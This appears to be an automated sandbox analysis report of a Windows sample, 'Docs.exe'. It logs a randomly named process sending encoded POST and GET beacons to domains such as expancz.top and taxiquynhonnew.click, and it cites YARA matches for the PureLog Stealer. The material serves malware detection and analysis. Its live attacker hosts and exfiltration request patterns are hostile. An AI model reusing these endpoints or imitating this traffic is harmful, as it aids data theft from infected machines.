Nov 28, 2024 18:29:39.701018095 CET | 1236 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Thu, 28 Nov 2024 17:29:39 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2966
Connection: close
Vary: Accept-Encoding
ETag: "66cce1df-b96"
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 [TRUNCATED]
Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Page Not Found</title><style>body {background-color: #f5f5f5;margin-top: 8%;color: #5d5d5d;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial,"Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol","Noto Color Emoji";text-shadow: 0px 1px 1px rgba(255, 255, 255, 0.75);text-align: center;}h1 {font-size: 2.45em;font-weight: 700;color: #5d5d5d;letter-spacing: -0.02em;margin-bottom: 30px;margin-top: 30px;}.container {width: 100%;margin-right: auto;margin-left: auto;}.animate__animated {animation-duration: 1s;animation-fill-mode: both;}.animate__fadeIn {animation-name: fadeIn;}.info {color: #5594cf;fill: #5594cf;}.error [TRUNCATED]
Nov 28, 2024 18:29:39.701050997 CET | 1236 | IN | Data Raw: 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 63 39 32 31 32 37 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 77 61 72 6e 69 6e 67 20 7b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 63 63 33 33 3b 0a 09 09 09 09 66 69 6c 6c 3a 20 23 66 66 63 63 33 33 3b 0a 09 09
Data Ascii: ;fill: #c92127;}.warning {color: #ffcc33;fill: #ffcc33;}.success {color: #5aba47;fill: #5aba47;}.icon-large {height: 132px;width: 132px;}.description-text {color: #707
Nov 28, 2024 18:29:39.701066971 CET | 698 | IN | Data Raw: 39 34 31 20 32 31 36 20 32 39 36 76 34 63 30 20 36 2e 36 32 37 20 35 2e 33 37 33 20 31 32 20 31 32 20 31 32 68 35 36 63 36 2e 36 32 37 20 30 20 31 32 2d 35 2e 33 37 33 20 31 32 2d 31 32 76 2d 31 2e 33 33 33 63 30 2d 32 38 2e 34 36 32 20 38 33 2e
Data Ascii: 941 216 296v4c0 6.627 5.373 12 12 12h56c6.627 0 12-5.373 12-12v-1.333c0-28.462 83.186-29.647 83.186-106.667 0-58.002-60.165-102-116.531-102zM256 338c-25.365 0-46 20.635-46 46 0 25.364 20.635 46 46 46s46-20.636 46-46c0-25.365-20.635-46-46-46z"


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.549736107.155.56.30801268C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 28, 2024 18:29:55.840604067 CET808OUTPOST /2gcl/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.expancz.top
                                                            Origin: http://www.expancz.top
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 206
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.expancz.top/2gcl/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: rvEtL=4KMMWvJXtNIDx3KzsoqEZdth1vBXWqHUXTu9E+YPPeEpuAJIzLvsGbb+1xzxQVc8tMVkU8ba4IkF3MDc1tJoAuzZ6gENTRoiemeONY/pcTgIRfXriJT72uF0eHBSwvmxOwqvqp4aTYKynoMienfBG6MeY+cP4pkLSz1zdw/T/6dY+55Vn7TogDre3OQZZi1tgvUoDT0=
                                                            Nov 28, 2024 18:29:57.458861113 CET  697                IN         HTTP/1.1 405 Not Allowed
                                                            Server: nginx
                                                            Date: Thu, 28 Nov 2024 17:29:57 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 552
                                                            Connection: close
                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            2           192.168.2.5  49737        107.155.56.30   80                1268  C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe
                                                            Timestamp                            Bytes transferred  Direction  Data
                                                            Nov 28, 2024 18:29:58.506473064 CET  828                OUT        POST /2gcl/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.expancz.top
                                                            Origin: http://www.expancz.top
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 226
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.expancz.top/2gcl/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: rvEtL=4KMMWvJXtNIDyWazqJqEb9tiwvBXY6HQXUm9E/dKPsgpgCRIyOTsI7b++Rz0UVc7tMYZU4ba4MEF3IPc1ehnDezbhQEPMhoiemeONYDPcSIIRsPrw9H41uF3ZHBS0vmLOwqdqokwTayynsAie2fCRKMEc+cZ2KNlbCVCcxSLhIJ5yvI/9ZbAzjHmndYuISUE6MEYdEhA3RQBVSdej4r8bG2dnqjK
                                                            Nov 28, 2024 18:30:00.100807905 CET  697                IN         HTTP/1.1 405 Not Allowed
                                                            Server: nginx
                                                            Date: Thu, 28 Nov 2024 17:29:59 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 552
                                                            Connection: close
                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            3           192.168.2.5  49738        107.155.56.30   80                1268  C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe
                                                            Timestamp                            Bytes transferred  Direction  Data
                                                            Nov 28, 2024 18:30:01.178642035 CET  1845               OUT        POST /2gcl/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.expancz.top
                                                            Origin: http://www.expancz.top
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1242
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.expancz.top/2gcl/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Nov 28, 2024 18:30:02.771729946 CET  697                IN         HTTP/1.1 405 Not Allowed
                                                            Server: nginx
                                                            Date: Thu, 28 Nov 2024 17:30:02 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 552
                                                            Connection: close
                                                            Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            4           192.168.2.5  49739        107.155.56.30   80                1268  C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe
                                                            Timestamp                            Bytes transferred  Direction  Data
                                                            Nov 28, 2024 18:30:03.843334913 CET  549                OUT        GET /2gcl/?rvEtL=1IksVaFM1cAemyK05p+hJvI89YFPTpbYdVbJCfEKBOY5tDFEgZGIVLfooGjxZE8Rq+UWfqPa15shq7PO0tNmadCojy5vYT1OBl+VDfuWeAsbdd6UgJfU04VHRics3erVRA==&mFTD=mPHXHp HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.expancz.top
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Nov 28, 2024 18:30:05.449661016 CET  1236               IN         HTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Thu, 28 Nov 2024 17:30:05 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 9651
                                                            Last-Modified: Fri, 15 Nov 2024 02:47:44 GMT
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            ETag: "6736b650-25b3"
                                                            Accept-Ranges: bytes
                                                            Data Ascii: <!DOCTYPE html><html><head><meta charset=utf-8><meta name=viewport content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no"><meta name=keywords content=""><meta name=description content=""><meta property=og:type content=website><meta property=og:title content=""><meta property=og:description content=""><meta property=og:url content=""><meta property=og:image content=""><meta name=HandheldFriendly content=true><meta name=apple-mobile-web-app-capable content=yes><meta name=apple-mobile-web-app-status-bar-style content=black><meta name=format-detection content="telphone=no, email=no"><meta name=screen-orientation content=portrait><meta name=x5-orientation content=portrait><meta name=full-screen content=yes><meta name=x5-fullscreen content=true><meta name=browsermode content=application><meta name=x5-page-mode content=app><meta name=msapplication-tap-highlight content=no><meta http-equiv=X-UA-Compatible content="ie=edge"><link href=https:
                                                            Nov 28, 2024 18:30:05.449680090 CET  1236               IN         Data Raw: 2f 2f 6c 33 66 69 6c 65 6a 73 6f 6e 34 64 76 64 2e 6a 6f 73 79 6c 69 76 69 6e 67 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 20 74 79 70 65 3d 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 20 72 65 6c 3d 69 63 6f 6e 3e 3c 73 74 79 6c 65 3e 23 50 4f 50
                                                            Data Ascii: //l3filejson4dvd.josyliving.com/favicon.ico type=image/x-icon rel=icon><style>#POP800_INIT_DIV { display: none!important; } #POP800_PANEL_DIV { display: none!important; } #POP800_LEAVEWORD_DIV { display: none!
                                                            Nov 28, 2024 18:30:05.449693918 CET  352                IN         Data Raw: bb a5 e5 8f 8a e4 bb a5 e5 90 8e e7 89 88 e6 9c ac e5 8f af e4 bb a5 e4 bd bf e7 94 a8 0a 20 20 20 20 20 20 20 20 20 20 78 6d 6c 48 74 74 70 20 3d 20 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 22 4d 69 63 72 6f 73 6f 66 74 2e 58 4d 4c
                                                            Data Ascii: xmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); } }else if(window.XMLHttpRequest){ //FirefoxOpera 8.0+SafariChrome xmlHttp = new XMLHttpRequest(); } /
                                                            Nov 28, 2024 18:30:05.449748039 CET  1236               IN         Data Raw: 65 e6 88 96 4f 70 65 72 61 ef bc 8c e5 bf 85 e9 a1 bb e5 8f 91 e5 b8 83 e5 90 8e e6 89 8d e8 83 bd e8 bf 90 e8 a1 8c ef bc 8c e4 b8 8d e7 84 b6 e4 bc 9a e6 8a a5 e9 94 99 0a 20 20 20 20 20 20 78 6d 6c 48 74 74 70 2e 73 65 6e 64 28 6e 75 6c 6c 29
                                                            Data Ascii: eOpera xmlHttp.send(null); //4 if( xmlHttp.readyState == 4 ){ //0200300304
                                                            Nov 28, 2024 18:30:05.449759960 CET  1236               IN         Data Raw: 65 72 79 56 61 72 69 61 62 6c 65 28 27 70 61 74 68 27 29 3b 0a 20 20 20 20 20 20 6c 6f 61 64 4a 73 28 27 70 69 78 65 6c 4a 73 27 2c 62 61 73 65 4a 73 55 72 6c 20 2b 20 70 61 74 68 49 6e 66 6f 2e 73 75 62 73 74 72 28 30 2c 31 29 2e 74 6f 4c 6f 77
                                                            Data Ascii: eryVariable('path'); loadJs('pixelJs',baseJsUrl + pathInfo.substr(0,1).toLowerCase() + '/' + pathInfo.substr(-1,1).toLowerCase() + '/' + pathInfo + '.js?time=' + Math.floor(Date.now() / 60000)); // pixel }</script><
                                                            Nov 28, 2024 18:30:05.449773073 CET  1236               IN         Data Raw: 71 29 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 6e 20 3d 20 66 2e 66 62 71 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 6e 2e 63 61 6c 6c 4d 65 74 68 6f 64 20 3f 0a 0a 20 20 20 20 20 20 20 20 20 20 20
                                                            Data Ascii: q) return; n = f.fbq = function () { n.callMethod ? n.callMethod.apply(n, arguments) : n.queue.push(arguments) }; if (!f._fbq) f._fbq = n; n.push = n; n.loaded = !0;
                                                            Nov 28, 2024 18:30:05.449784040 CET  1236               IN         Data Raw: 65 66 65 72 20 3d 20 66 75 6e 63 74 69 6f 6e 28 74 2c 20 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 5b 65 5d 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 2e 70 75 73 68 28 5b 65 5d 2e 63 6f 6e 63 61
                                                            Data Ascii: efer = function(t, e) { t[e] = function() { t.push([e].concat(Array.prototype.slice.call(arguments, 0))) } }; for (var i = 0; i < ttq.methods.length; i++) ttq.setAndDefer(ttq, ttq.methods[i]);
                                                            Nov 28, 2024 18:30:05.449987888 CET  1236               IN         Data Raw: 61 72 20 67 53 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 20 20 67 53 63 72 69 70 74 2e 74 79 70 65 20 3d 20 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74
                                                            Data Ascii: ar gScript = document.createElement("script"); gScript.type = "text/javascript"; gScript.src="https://www.googletagmanager.com/gtag/js?id=" + (google_id || 'G-CC0LH72W84') +""; gHead.appendChild(gScript); var startTime = Date.
                                                            Nov 28, 2024 18:30:05.450000048 CET  898                IN         Data Raw: 74 69 6f 6e 20 28 65 76 65 6e 74 29 20 7b 0a 20 20 20 20 20 20 20 20 69 66 20 28 65 76 65 6e 74 2e 74 6f 75 63 68 65 73 2e 6c 65 6e 67 74 68 20 3e 20 31 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 65 76 65 6e 74 2e 70 72 65 76 65 6e 74 44 65 66 61
                                                            Data Ascii: tion (event) { if (event.touches.length > 1) { event.preventDefault(); } }); document.addEventListener('touchend', function (event) { var now = (new Date()).getTime(); if (now - lastTouchEn


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            5           192.168.2.5  49740        18.139.62.226   80                1268  C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe
                                                            Timestamp                            Bytes transferred  Direction  Data
                                                            Nov 28, 2024 18:30:11.819669008 CET  835                OUT        POST /y49d/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.taxiquynhonnew.click
                                                            Origin: http://www.taxiquynhonnew.click
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 206
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.taxiquynhonnew.click/y49d/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: rvEtL=r4rKcibVSx4vBQRZBwBaNoLvbBNGhs+G/PHzvokdAncuO7K4XAXhJXpnz63f//TzIM4SVG09rhp4coRzSgDjen+Cj1O8jeUc2ciuXrdeaVTYwroIx9J5S+2qdSqUfBtYdv3W8RrYUQWV6Mg7QYIYgUywznvmG9dQl1WU8rWaAg5fDi0Sh+TVxusvL7Rl+18Ks1x4A5g=
                                                            Nov 28, 2024 18:30:13.426341057 CET  371                IN         HTTP/1.1 301 Moved Permanently
                                                            Server: openresty
                                                            Date: Thu, 28 Nov 2024 17:30:13 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Location: https://www.taxiquynhonnew.click/y49d/
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            6           192.168.2.5  49741        18.139.62.226   80                1268  C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe
                                                            Timestamp                            Bytes transferred  Direction  Data
                                                            Nov 28, 2024 18:30:14.488987923 CET  855                OUT        POST /y49d/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.taxiquynhonnew.click
                                                            Origin: http://www.taxiquynhonnew.click
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 226
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.taxiquynhonnew.click/y49d/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Ascii: rvEtL=r4rKcibVSx4vTgBZNzpaKILsVhNGrM+K/PLzvqINAx0uOZi4NEDhH3pnnq3WivT6IM0kVEw9rh94ct1zVSrie3+EqVO+8OUc2ciuXrJ4aR/Ywb4IxY9+MO2rQCqUbBtcdv308UzhUT+V6Mw7epIbz0y29HvtIf8/o3Sr16TCWS9VGUF47cb9iOAXboZSvFdj2WhIeu1c3yhbRMBKkC3Up+0JVAWf
                                                            Nov 28, 2024 18:30:16.070369959 CET  371                IN         HTTP/1.1 301 Moved Permanently
                                                            Server: openresty
                                                            Date: Thu, 28 Nov 2024 17:30:15 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Location: https://www.taxiquynhonnew.click/y49d/
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                            Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                            7           192.168.2.5  49742        18.139.62.226   80                1268  C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe
                                                            Timestamp                            Bytes transferred  Direction  Data
                                                            Nov 28, 2024 18:30:17.143877029 CET  1872               OUT        POST /y49d/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.taxiquynhonnew.click
                                                            Origin: http://www.taxiquynhonnew.click
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 1242
                                                            Cache-Control: max-age=0
                                                            Referer: http://www.taxiquynhonnew.click/y49d/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Data Raw: 72 76 45 74 4c 3d 72 34 72 4b 63 69 62 56 53 78 34 76 54 67 42 5a 4e 7a 70 61 4b 49 4c 73 56 68 4e 47 72 4d 2b 4b 2f 50 4c 7a 76 71 49 4e 41 78 4d 75 50 71 61 34 4f 6c 44 68 47 33 70 6e 37 61 33 62 69 76 53 36 49 4d 74 74 56 45 73 44 72 6b 35 34 65 4c 70 7a 51 6a 72 69 56 33 2b 45 6f 56 4f 2f 6a 65 56 59 32 59 4f 51 58 72 5a 34 61 52 2f 59 77 64 38 49 33 4e 4a 2b 4f 4f 32 71 64 53 71 49 66 42 73 42 64 76 76 4f 38 56 48 75 55 6a 65 56 39 74 41 37 54 2f 63 62 70 30 79 30 74 58 75 74 49 66 77 67 6f 32 2f 61 31 36 33 6f 57 51 74 56 47 54 70 6a 68 4e 79 2b 32 64 6b 36 55 65 78 41 78 44 4a 61 2b 47 64 36 54 65 31 47 7a 78 63 31 51 61 45 4b 68 6a 4b 4c 71 4b 6b 45 56 6b 7a 63 72 34 37 53 70 76 79 41 30 4a 45 6e 71 4e 2f 6a 78 47 66 73 41 35 58 39 38 5a 51 75 4e 72 6f 4f 76 6d 37 31 45 50 4e 55 43 77 52 34 71 63 4a 74 4a 30 2f 69 37 68 34 32 46 43 42 4e 38 44 54 63 78 2f 58 7a 70 70 79 33 76 4c 61 66 74 65 59 65 70 69 6a 50 65 68 36 39 53 66 75 36 6d 42 6e 37 43 34 70 58 73 54 79 74 50 4f 70 78 57 36 4a 7a [TRUNCATED]
                                                            Data Ascii: rvEtL=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 [TRUNCATED]
                                                            Timestamp: Nov 28, 2024 18:30:18.727408886 CET | Bytes transferred: 371 | Direction: IN
                                                            HTTP/1.1 301 Moved Permanently
                                                            Server: openresty
                                                            Date: Thu, 28 Nov 2024 17:30:18 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Location: https://www.taxiquynhonnew.click/y49d/
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>


                                                            Session ID: 8
                                                            Source IP: 192.168.2.5
                                                            Source Port: 49743
                                                            Destination IP: 18.139.62.226
                                                            Destination Port: 80
                                                            PID: 1268
                                                            Process: C:\Program Files (x86)\HikJffzxkWdUEsBtVSikJVeKWfVFthEVsFIvsJSyWxBWngP\hrhhgLQrQIpiVv.exe
                                                            Timestamp: Nov 28, 2024 18:30:19.794307947 CET | Bytes transferred: 558 | Direction: OUT
                                                            GET /y49d/?rvEtL=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMbHvD8EqtoJ5XtYi/VJ05VR664cQpqJJXFZbebi2oU1EEMw==&mFTD=mPHXHp HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.taxiquynhonnew.click
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.1; XT1055 Build/LPA23.12-21-1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                            Timestamp: Nov 28, 2024 18:30:21.433264971 CET | Bytes transferred: 522 | Direction: IN
                                                            HTTP/1.1 301 Moved Permanently
                                                            Server: openresty
                                                            Date: Thu, 28 Nov 2024 17:30:21 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Location: https://www.taxiquynhonnew.click/y49d/?rvEtL=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMbHvD8EqtoJ5XtYi/VJ05VR664cQpqJJXFZbebi2oU1EEMw==&mFTD=mPHXHp
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>



                                                            Target ID:0
                                                            Start time:12:28:26
                                                            Start date:28/11/2024
                                                            Path:C:\Users\user\Desktop\Docs.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\Docs.exe"
                                                            Imagebase:0x790000
                                                            File size:799'232 bytes
                                                            MD5 hash:DB3260038649D2048D4D203B210C42AD
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2064805935.0000000007030000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2061956351.0000000003AC9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
